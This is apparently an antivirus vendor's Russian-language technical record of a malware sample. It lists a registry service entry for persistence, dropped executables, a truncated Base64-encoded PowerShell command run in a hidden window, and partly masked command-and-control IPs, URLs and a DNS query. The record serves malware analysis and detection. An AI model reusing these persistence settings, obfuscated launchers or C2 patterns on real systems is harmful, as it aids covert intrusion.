Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\ndishc] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\ndishc] 'ImagePath' = '"<SYSTEM32>\odbcjt32\ndishc.exe"'
- 'ndishc' "<SYSTEM32>\odbcjt32\ndishc.exe"
- 'ndishc' <SYSTEM32>\odbcjt32\ndishc.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABQAGMAagBuAHcAZwBwAD0AKAAoACcARAAnACsAJwBiAG8AJwApACsAJwAwACcAKwAoACcAcwAnACsAJwB1AGMAJwApACkAOwAuACgAJwBuACcAKwAnAGUAdwAtAGkAJwArACcAdABlAG0AJwApACAAJABFAE4AdgA6AFUAUwBlAFIAcAByAG8ARgBJAE...
- %HOMEPATH%\ctn66fz\mp9t847\k1r4jlz.exe
- <SYSTEM32>\odbcjt32\ndishc.exe
- %HOMEPATH%\ctn66fz\mp9t847\k1r4jlz.exe в <SYSTEM32>\odbcjt32\ndishc.exe
- '18#.#15.227.107':443
- http://ra###submit.com/search_test/s/
- http://18#.##5.227.107:443/s4LCP2aBPBLc72/kvcvjzzfMSBP3UZu/9uY3PoB3DSmu5kc0/2LacZlHhKb/jfastUseM/ via 18#.#15.227.107
- DNS ASK ra###submit.com
- '%HOMEPATH%\ctn66fz\mp9t847\k1r4jlz.exe'
- '<SYSTEM32>\odbcjt32\ndishc.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABQAGMAagBuAHcAZwBwAD0AKAAoACcARAAnACsAJwBiAG8AJwApACsAJwAwACcAKwAoACcAcwAnACsAJwB1AGMAJwApACkAOwAuACgAJwBuACcAKwAnAGUAdwAtAGkAJwArACcAdABlAG0AJwApACAAJABFAE4AdgA6AFUAUwBlAFIAcAByAG8ARgBJAE...' (со скрытым окном)